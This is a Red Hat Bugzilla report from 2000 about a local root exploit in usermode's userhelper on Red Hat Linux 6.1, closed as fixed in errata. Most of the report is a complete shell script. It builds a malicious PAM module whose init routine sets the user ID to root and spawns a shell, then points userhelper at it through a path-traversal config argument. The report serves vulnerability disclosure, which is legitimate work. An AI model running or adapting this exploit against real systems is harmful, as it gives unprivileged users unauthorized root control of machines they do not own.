Bug 9825 - pam crackable
Summary: pam crackable
Status: CLOSED ERRATA
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: usermode
Version: 6.1
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Nalin Dahyabhai
QA Contact:
URL:
Whiteboard:
Keywords: Security
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2000-02-28 11:53 UTC by Rakesh Tiwari
Modified: 2008-05-01 15:37 UTC (History)
0 users

(edit)
Clone Of:
(edit)
Last Closed: 2000-02-28 15:50:12 UTC


Attachments (Terms of Use)

Description Rakesh Tiwari 2000-02-28 11:53:33 UTC
by using the script, any normal user on a redhat 61 sever is able to get
'root' rights. The 'id' gets changed to 'root'.
#!/bin/sh
cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
    setuid(geteuid());
    system("/bin/sh");
}
EOF

echo -n .

echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf

echo -n .

gcc -fPIC -o _pamslam.o -c _pamslam.c

echo -n o

ld -shared -o _pamslam.so _pamslam.o

echo -n o

chmod 755 _pamslam.so

echo -n O


echo O

/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf

sleep 1s

Comment 1 Bill Nottingham 2000-02-28 15:50:59 UTC
This has already been fixed in the errata releases...


Note You need to log in before you can comment on or make changes to this bug.